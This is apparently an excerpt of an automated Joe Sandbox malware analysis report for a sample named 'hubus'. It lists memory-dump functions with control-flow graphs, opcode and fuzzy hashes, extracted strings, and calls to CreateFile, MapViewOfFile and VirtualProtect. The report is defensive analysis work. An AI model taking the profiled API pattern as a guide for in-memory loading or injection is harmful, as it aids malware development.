                                                                                                                                                                                                                                                              control_flow_graph 438 5a8e680-5a8e6a8 440 5a8e6aa-5a8e6f1 438->440 441 5a8e6f6-5a8e704 438->441 485 5a8eb4d-5a8eb54 440->485 442 5a8e713 441->442 443 5a8e706-5a8e711 441->443 444 5a8e715-5a8e71c 442->444 443->444 446 5a8e722-5a8e726 444->446 447 5a8e805-5a8e809 444->447 449 5a8e72c-5a8e730 446->449 450 5a8eb55-5a8eb7d 446->450 452 5a8e80b-5a8e81a 447->452 453 5a8e85f-5a8e869 447->453 454 5a8e742-5a8e7a0 449->454 455 5a8e732-5a8e73c 449->455 459 5a8eb84-5a8ebae 450->459 465 5a8e81e-5a8e823 452->465 456 5a8e86b-5a8e87a 453->456 457 5a8e8a2-5a8e8c8 453->457 494 5a8ec13-5a8ec3d 454->494 495 5a8e7a6-5a8e800 454->495 455->454 455->459 469 5a8e880-5a8e89d 456->469 470 5a8ebb6-5a8ebcc 456->470 477 5a8e8ca-5a8e8d3 457->477 478 5a8e8d5 457->478 459->470 471 5a8e81c 465->471 472 5a8e825-5a8e85a 465->472 469->485 492 5a8ebd4-5a8ec0c 470->492 471->465 472->485 483 5a8e8d7-5a8e8ff 477->483 478->483 499 5a8e9d0-5a8e9d4 483->499 500 5a8e905-5a8e91e 483->500 492->494 502 5a8ec3f-5a8ec45 494->502 503 5a8ec47-5a8ec4d 494->503 495->485 504 5a8ea4e-5a8ea58 499->504 505 5a8e9d6-5a8e9ef 499->505 500->499 525 5a8e924-5a8e933 500->525 502->503 507 5a8ec4e-5a8ec8b 502->507 509 5a8ea5a-5a8ea64 504->509 510 5a8eab5-5a8eabe 504->510 505->504 530 5a8e9f1-5a8ea00 505->530 523 5a8ea6a-5a8ea7c 509->523 524 5a8ea66-5a8ea68 509->524 512 5a8eac0-5a8eaee 510->512 513 5a8eaf6-5a8eb43 510->513 512->513 536 5a8eb4b 513->536 526 5a8ea7e-5a8ea80 523->526 524->526 537 5a8e94b-5a8e960 525->537 538 5a8e935-5a8e93b 525->538 534 5a8eaae-5a8eab3 526->534 535 5a8ea82-5a8ea86 526->535 550 5a8ea18-5a8ea23 530->550 551 5a8ea02-5a8ea08 530->551 534->509 534->510 539 5a8ea88-5a8eaa1 535->539 540 5a8eaa4-5a8eaa7 535->540 536->485 548 5a8e962-5a8e98e 537->548 549 5a8e994-5a8e99d 537->549 544 5a8e93d 538->544 545 5a8e93f-5a8e941 538->545 539->540 540->534 544->537 545->537 548->492 548->549 549->494 557 5a8e9a3-5a8e9ca 549->557 550->494 554 5a8ea29-5a8ea4c 550->554 552 5a8ea0a 551->552 553 5a8ea0c-5a8ea0e 551->553 552->550 553->550 554->504 554->530 557->499 557->525
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: HAr$HAr$HAr
                                                                                                                                                                                                                                                              • API String ID: 0-3039488707
                                                                                                                                                                                                                                                              • Opcode ID: 1675f541253b70936c296224a5d6d7372f4e83fbe8d457101fb52f468d870866
                                                                                                                                                                                                                                                              • Instruction ID: d5557b3f43dff45f91fcbed1eecacc912086e2a5b2bda182194650b51ea16330
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1675f541253b70936c296224a5d6d7372f4e83fbe8d457101fb52f468d870866
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F123A31A00205DFCB25EFA9C894A6EBBF6FF88305B14856DD4569B390DB35EC49CB90
                                                                                                                                                                                                                                                              Function 05AA0040 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 568 5aa0040-5aa006b 569 5aa0073-5aa007d 568->569 669 5aa006d call 5aa0549 568->669 670 5aa006d call 5aa0560 568->670 570 5aa009f-5aa00b5 569->570 571 5aa007f-5aa0082 569->571 576 5aa042b-5aa043f 570->576 577 5aa00bb-5aa00c7 570->577 664 5aa0084 call 5aa0948 571->664 665 5aa0084 call 5aa0958 571->665 666 5aa0084 call 5aa09b0 571->666 572 5aa008a-5aa008c 572->570 574 5aa008e-5aa0096 572->574 574->570 586 5aa047f-5aa0488 576->586 578 5aa01f8-5aa01ff 577->578 579 5aa00cd-5aa00d0 577->579 582 5aa032e-5aa0368 578->582 583 5aa0205-5aa020e 578->583 580 5aa00d3-5aa00dc 579->580 584 5aa00e2-5aa00f6 580->584 585 5aa0520 580->585 667 5aa036b call 5aa27e2 582->667 668 5aa036b call 5aa27f0 582->668 583->582 587 5aa0214-5aa0320 583->587 599 5aa01e8-5aa01f2 584->599 600 5aa00fc-5aa0120 584->600 590 5aa0525-5aa0529 585->590 588 5aa048a-5aa0491 586->588 589 5aa044d-5aa0456 586->589 661 5aa032b-5aa032c 587->661 662 5aa0322 587->662 593 5aa04df-5aa04e6 588->593 594 5aa0493-5aa04d6 588->594 589->585 598 5aa045c-5aa046e 589->598 596 5aa052b 590->596 597 5aa0534 590->597 601 5aa050b-5aa051e 593->601 602 5aa04e8-5aa04f8 593->602 594->593 596->597 605 5aa0535 597->605 608 5aa047e 598->608 609 5aa0470-5aa0475 598->609 599->578 599->580 625 5aa0128-5aa0191 600->625 601->590 602->601 613 5aa04fa-5aa0502 602->613 605->605 608->586 671 5aa0478 call 5aa2f8a 609->671 672 5aa0478 call 5aa2f90 609->672 613->601 620 5aa0371-5aa0422 620->576 646 5aa0193-5aa01a9 625->646 647 5aa01b0-5aa01e3 625->647 646->647 647->599 661->582 662->661 664->572 665->572 666->572 667->620 668->620 669->569 670->569 671->608 672->608
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1785461895
                                                                                                                                                                                                                                                              • Opcode ID: c028a3f38123fb72b8ce2b99182e1efb2d3f31c24019740dc3a5df1c8d7ce97e
                                                                                                                                                                                                                                                              • Instruction ID: 035a81c740e99b64d6b38496104a91dddc679acc80859d318df74cf57b75378b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c028a3f38123fb72b8ce2b99182e1efb2d3f31c24019740dc3a5df1c8d7ce97e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F1D634A10119DFCB14EFA4D998EADBBB2FF88300F118159E506AB3A5DB75EC46CB50
                                                                                                                                                                                                                                                              Function 05AA4620 Relevance: 4.1, Strings: 3, Instructions: 357COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 673 5aa4620-5aa4630 674 5aa4749-5aa476e 673->674 675 5aa4636-5aa463a 673->675 677 5aa4775-5aa479a 674->677 676 5aa4640-5aa4649 675->676 675->677 678 5aa464f-5aa4676 676->678 679 5aa47a1-5aa47d7 676->679 677->679 690 5aa473e-5aa4748 678->690 691 5aa467c-5aa467e 678->691 697 5aa47de-5aa4834 679->697 692 5aa469f-5aa46a1 691->692 693 5aa4680-5aa4683 691->693 695 5aa46a4-5aa46a8 692->695 696 5aa4689-5aa4693 693->696 693->697 700 5aa46aa-5aa46b9 695->700 701 5aa4709-5aa4715 695->701 696->697 698 5aa4699-5aa469d 696->698 711 5aa4858-5aa486f 697->711 712 5aa4836-5aa483b 697->712 698->692 698->695 700->697 706 5aa46bf-5aa4706 700->706 701->697 702 5aa471b-5aa4738 701->702 702->690 702->691 706->701 719 5aa4960-5aa4970 711->719 720 5aa4875-5aa495b call 5aa3658 call 5aa27f0 call 5aa06f0 711->720 773 5aa483e call 5aa4af2 712->773 774 5aa483e call 5aa4b00 712->774 715 5aa4844-5aa484a 775 5aa484d call 5aa4f5a 715->775 776 5aa484d call 5aa4fb8 715->776 777 5aa484d call 5aa5140 715->777 718 5aa4853 722 5aa4a83-5aa4a8e 718->722 729 5aa4a5e-5aa4a7a 719->729 730 5aa4976-5aa4a50 call 5aa0600 719->730 720->719 727 5aa4abd-5aa4ade 722->727 728 5aa4a90-5aa4aa0 722->728 736 5aa4aa2-5aa4aa8 728->736 737 5aa4ab0-5aa4ab8 call 5aa06f0 728->737 729->722 770 5aa4a5b 730->770 771 5aa4a52 730->771 736->737 737->727 770->729 771->770 773->715 774->715 775->718 776->718 777->718
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar$(Ar$HAr
                                                                                                                                                                                                                                                              • API String ID: 0-2497560704
                                                                                                                                                                                                                                                              • Opcode ID: 4c055fe01afa642af4db2c8d711c35a233c6b37128650dd9efd41ddd2ebfd3f1
                                                                                                                                                                                                                                                              • Instruction ID: 083023fdf69ce9b2b020a3ff0af91d0bc2afe9b470ef63b8913cd39cd7d676a1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c055fe01afa642af4db2c8d711c35a233c6b37128650dd9efd41ddd2ebfd3f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E11D35B00609DFCB05EFA4D5949AEBBB2FF89300F108569E816AB364DB74EC45CB91
                                                                                                                                                                                                                                                              Function 02EE40E0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1064 2ee40e0-2ee4108 1065 2ee410f-2ee4138 1064->1065 1066 2ee410a 1064->1066 1067 2ee413a-2ee4143 1065->1067 1068 2ee4159 1065->1068 1066->1065 1069 2ee414a-2ee414d 1067->1069 1070 2ee4145-2ee4148 1067->1070 1071 2ee415c-2ee4160 1068->1071 1073 2ee4157 1069->1073 1070->1073 1072 2ee4517-2ee452e 1071->1072 1075 2ee4534-2ee4538 1072->1075 1076 2ee4165-2ee4169 1072->1076 1073->1071 1079 2ee456d-2ee4571 1075->1079 1080 2ee453a-2ee456a 1075->1080 1077 2ee416e-2ee4172 1076->1077 1078 2ee416b-2ee41c8 1076->1078 1082 2ee419b-2ee419e 1077->1082 1083 2ee4174-2ee4198 1077->1083 1086 2ee41cd-2ee41d1 1078->1086 1087 2ee41ca-2ee423b 1078->1087 1084 2ee4592 1079->1084 1085 2ee4573-2ee457c 1079->1085 1080->1079 1189 2ee41a0 call 5aa9440 1082->1189 1190 2ee41a0 call 5aa9450 1082->1190 1083->1082 1090 2ee4595-2ee459b 1084->1090 1088 2ee457e-2ee4581 1085->1088 1089 2ee4583-2ee4586 1085->1089 1093 2ee41fa-2ee420b 1086->1093 1094 2ee41d3-2ee41f7 1086->1094 1099 2ee423d-2ee429a 1087->1099 1100 2ee4240-2ee4244 1087->1100 1096 2ee4590 1088->1096 1089->1096 1118 2ee4214-2ee4221 1093->1118 1094->1093 1096->1090 1097 2ee41a6-2ee41bf 1097->1072 1108 2ee429f-2ee42a3 1099->1108 1109 2ee429c-2ee42f8 1099->1109 1102 2ee426d-2ee4291 1100->1102 1103 2ee4246-2ee426a 1100->1103 1102->1072 1103->1102 1112 2ee42cc-2ee42ef 1108->1112 1113 2ee42a5-2ee42c9 1108->1113 1119 2ee42fd-2ee4301 1109->1119 1120 2ee42fa-2ee435c 1109->1120 1112->1072 1113->1112 1121 2ee4223-2ee4229 1118->1121 1122 2ee4231-2ee4232 1118->1122 1124 2ee432a-2ee4342 1119->1124 1125 2ee4303-2ee4327 1119->1125 1131 2ee435e-2ee43c0 1120->1131 1132 2ee4361-2ee4365 1120->1132 1121->1122 1122->1072 1143 2ee4344-2ee434a 1124->1143 1144 2ee4352-2ee4353 1124->1144 1125->1124 1141 2ee43c5-2ee43c9 1131->1141 1142 2ee43c2-2ee4424 1131->1142 1134 2ee438e-2ee43a6 1132->1134 1135 2ee4367-2ee438b 1132->1135 1154 2ee43a8-2ee43ae 1134->1154 1155 2ee43b6-2ee43b7 1134->1155 1135->1134 1146 2ee43cb-2ee43ef 1141->1146 1147 2ee43f2-2ee440a 1141->1147 1152 2ee4429-2ee442d 1142->1152 1153 2ee4426-2ee4488 1142->1153 1143->1144 1144->1072 1146->1147 1165 2ee440c-2ee4412 1147->1165 1166 2ee441a-2ee441b 1147->1166 1157 2ee442f-2ee4453 1152->1157 1158 2ee4456-2ee446e 1152->1158 1163 2ee448d-2ee4491 1153->1163 1164 2ee448a-2ee44e3 1153->1164 1154->1155 1155->1072 1157->1158 1174 2ee447e-2ee447f 1158->1174 1175 2ee4470-2ee4476 1158->1175 1168 2ee44ba-2ee44dd 1163->1168 1169 2ee4493-2ee44b7 1163->1169 1176 2ee450c-2ee450f 1164->1176 1177 2ee44e5-2ee4509 1164->1177 1165->1166 1166->1072 1168->1072 1169->1168 1174->1072 1175->1174 1176->1072 1177->1176 1189->1097 1190->1097
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12074051424.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2ee0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: ef80f14a57b2c5919bc9c0ad8d1e46567864be97611cf4ef67013bb90644863d
                                                                                                                                                                                                                                                              • Instruction ID: d428ad2edda5e0b23170f56b0f1fa416aa811eb410e86109126939904607acb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef80f14a57b2c5919bc9c0ad8d1e46567864be97611cf4ef67013bb90644863d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF1C174E45218DFCF18DFA8E5886ADBBB2FF89305F20942AE416A7390DB355985CF10
                                                                                                                                                                                                                                                              Function 05A870FC Relevance: 2.5, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: @$}
                                                                                                                                                                                                                                                              • API String ID: 0-1351071989
                                                                                                                                                                                                                                                              • Opcode ID: 0d2b0c0526fdcef3b481d09a6bc072a5d495b5b4473c1566823cd037b2dc7773
                                                                                                                                                                                                                                                              • Instruction ID: a108e72aa0aa732ca12bbcb8c3b0af16cf05c563d7d7a8af38d85b1aca8085e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d2b0c0526fdcef3b481d09a6bc072a5d495b5b4473c1566823cd037b2dc7773
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F015B0D0A258CFDB21EF04D844FADBAB5BB05348F001099954837240C7389E88CF16
                                                                                                                                                                                                                                                              Function 05AA0F20 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,Ar
                                                                                                                                                                                                                                                              • API String ID: 0-3033950523
                                                                                                                                                                                                                                                              • Opcode ID: 0726776a10d7d56fc1afaf799afafb1b90c98846c18ef197adb0342cf1f54cee
                                                                                                                                                                                                                                                              • Instruction ID: 5a9ddf7f6a071ffd5cce5e133a3dc84c628ee5302c7c43a9c8b13e6fe555a0ba
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0726776a10d7d56fc1afaf799afafb1b90c98846c18ef197adb0342cf1f54cee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A520975A002289FDB68CF69C981BADBBF6BF88300F1581D9E549A7351DB309D84CF61
                                                                                                                                                                                                                                                              Function 05AE47D5 Relevance: 1.7, APIs: 1, Instructions: 156fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05AE4924
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                              • Opcode ID: 830d5f56ddf1f56041d44ac8bb6897585a11955865440f6d953b04f091a43095
                                                                                                                                                                                                                                                              • Instruction ID: e5c1a51e41a59216e38334e7d643d8395a12ad5dd6f471fe8f279842531fdb0d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 830d5f56ddf1f56041d44ac8bb6897585a11955865440f6d953b04f091a43095
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C051CFB4D002589FDF20CFA9D984BEEBBB5BF49304F20952AE815B7240DB749845CF54
                                                                                                                                                                                                                                                              Function 05AE47E0 Relevance: 1.7, APIs: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05AE4924
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                              • Opcode ID: af93750b517bea14def93f34c5d82459234f319bf67f243a91651421b13fd120
                                                                                                                                                                                                                                                              • Instruction ID: e308161eb97a8f80a122dd6029b691fd2cd73c64e2a3c4ca667cbf869e26f245
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af93750b517bea14def93f34c5d82459234f319bf67f243a91651421b13fd120
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF51DFB4D002589FDF20CFA9D984BEEBBB5BF49304F20952AE815B7240DB749845CF54
                                                                                                                                                                                                                                                              Function 05AE4C64 Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05AE4DA6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFileMapping
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 524692379-0
                                                                                                                                                                                                                                                              • Opcode ID: 63e03bf75a94ade355a888f2a665fb1d1851b6f17b0ce0b3e06998d0b9669d75
                                                                                                                                                                                                                                                              • Instruction ID: 379b2b9760acedd949b600df368fb8d2ee2efd7d378b23df64bc45edf5b8b18a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63e03bf75a94ade355a888f2a665fb1d1851b6f17b0ce0b3e06998d0b9669d75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1751E0B4D043189FDF10CFA9D985BEEBBB6BF09300F14942AE815AB240D7749885CF55
                                                                                                                                                                                                                                                              Function 05AE4C70 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05AE4DA6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFileMapping
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 524692379-0
                                                                                                                                                                                                                                                              • Opcode ID: c2ed1281dc96a3883533c497e74147c8835cae7364c9405fc9e45e855001d28c
                                                                                                                                                                                                                                                              • Instruction ID: 946425086560d7be336f39d27e0a9e9a97afad3c3dcdf6f171d0539afcd9283d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ed1281dc96a3883533c497e74147c8835cae7364c9405fc9e45e855001d28c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1651BFB4D043189FDF20CFA9D984BEEBBB6BF49310F149429E815AB240DB749885CF55
                                                                                                                                                                                                                                                              Function 05AE5050 Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05AE5102
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileView
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3314676101-0
                                                                                                                                                                                                                                                              • Opcode ID: 47148d015a561936f8a2e04ef8b8af2a0cdeebe6511b9575a02a3fc423387a87
                                                                                                                                                                                                                                                              • Instruction ID: fb5311361b6fe79b8f77a17e4059adbe3989280b1f82f6425ce64cf4673a283f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47148d015a561936f8a2e04ef8b8af2a0cdeebe6511b9575a02a3fc423387a87
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E63198B9D002589FCF10CFA9D984ADEFBB1BB49314F10942AE825BB300D735A905CF65
                                                                                                                                                                                                                                                              Function 05AE5058 Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05AE5102
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileView
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3314676101-0
                                                                                                                                                                                                                                                              • Opcode ID: c719b95a4b1468c02d0635a4368669b92c4339be7bf3ba647ae20b3bd8d9f180
                                                                                                                                                                                                                                                              • Instruction ID: 3dbe6ec8c0323cf461f25dba0d96339c1cadeadeb2cc20ada4216078c540e618
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c719b95a4b1468c02d0635a4368669b92c4339be7bf3ba647ae20b3bd8d9f180
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF31A9B9D002589FCF10CFA9D984ADEFBB1BB49314F10942AE815BB300D735A905CF65
                                                                                                                                                                                                                                                              Function 05AE5478 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AE5524
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: ebbbef5b5f774cbfbb7e766f1318cc42f23736a722a3a167927aa51bef99599c
                                                                                                                                                                                                                                                              • Instruction ID: 1c740a870199d4963c7c9d06d08dfc6a9c71de7a4a372d01ec16f235dea700d1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebbbef5b5f774cbfbb7e766f1318cc42f23736a722a3a167927aa51bef99599c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD31CAB9D002589FDF10CFA9E984AEEFBB1BB09314F10942AE814B7210D739A945CF64
                                                                                                                                                                                                                                                              Function 05AE5480 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AE5524
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: 2f935bac6db97f265a41acd5f7cb548d039feb11cfd078c2ae04077f09d14705
                                                                                                                                                                                                                                                              • Instruction ID: 4c52e8d490be801d90ac5e31bf867c47c6147d7d28de0e353bab39a409767169
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f935bac6db97f265a41acd5f7cb548d039feb11cfd078c2ae04077f09d14705
